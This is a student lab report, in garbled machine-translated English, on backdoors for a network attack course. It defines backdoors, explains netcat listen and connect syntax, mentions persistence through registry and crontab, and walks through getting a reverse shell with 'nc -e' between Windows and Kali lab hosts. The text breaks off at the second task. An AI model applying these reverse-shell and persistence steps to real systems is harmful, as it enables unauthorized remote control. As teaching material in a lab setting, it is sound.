2019-2020-2 20,175,335 Tenzin Norbu "Network Warfare Technology" Exp2 back door Principles and Practice
Prior knowledge before practice
A. (1) backdoor
Broad concept
Back door on the broad concept that does not pass through the normal certification process and the access channel system.
It may exist in the following locations:
- The compiler leave the back door
- Operating system to stay back door
- The application to stay back door
- Lurking in the operating system or to disguise a dedicated backdoor particular application.
Narrow concept
Back door on the narrow concept satisfies the following characteristics:
- Especially lurking in the operating system designed to do a backdoor program
- Malicious attacker can connect this program
- Remote execute various commands
- The concept and Trojans overlap
(2). Common backdoor
2.1 NC or netcat
ncat is a bottom tool, the basic TCP UDP data transmitting and receiving. Use is often combined with other tools, play the role of the back door.
linux, mac. . . Comes nc.
windows can code the cloud ( https://gitee.com/wildlinux/NetSec/attach_files decompression use) Download the "ncat.rar".
View Instructions for use: "man nc"
Connected to somewhere: NC [-options] hostname Port [S] [the ports]
bound port waiting for a connection: NC -l Port [-options] [hostname] [Port]
(3) basic questions answered
- Example you can think of possible ways to enter a backdoor on your system?
- When non-official website to download an application, it may be bundled with other software, thus leaving the back door in the system.
- How do you know that exemplified the back door to start up (win and linux) way?
- Win: Set boot from the start, modify the registry
- Linux: this experiment is
crontab
the timing provided to start; normal injection shellcode software
- Which gives you a deep mapping function Meterpreter there?
- After the backdoor a host, the host can directly control the shell, and even audio, video, etc., through key logger, you can easily get passwords password and other information
- How to find yourself the system has not been installed back door?
- Install antivirus software, the system detects the timing
- Open the firewall to see if there are abnormal port
Common backdoor practice
Task one: Windows to get Linux Shell
1, Windows: Use ipconfig
command to view the machine IP: 172.16.135.135
2. Use ncat.exe listens native 5335
port.
3, in the Kali environment, use the nc
command -e
option to reverse connection of a Windows host 5335
port.
4, the shell of Kali successful, as shown below:
Task two: Linux get Windows Shell
1, in Kali environment ifconfig
View IP: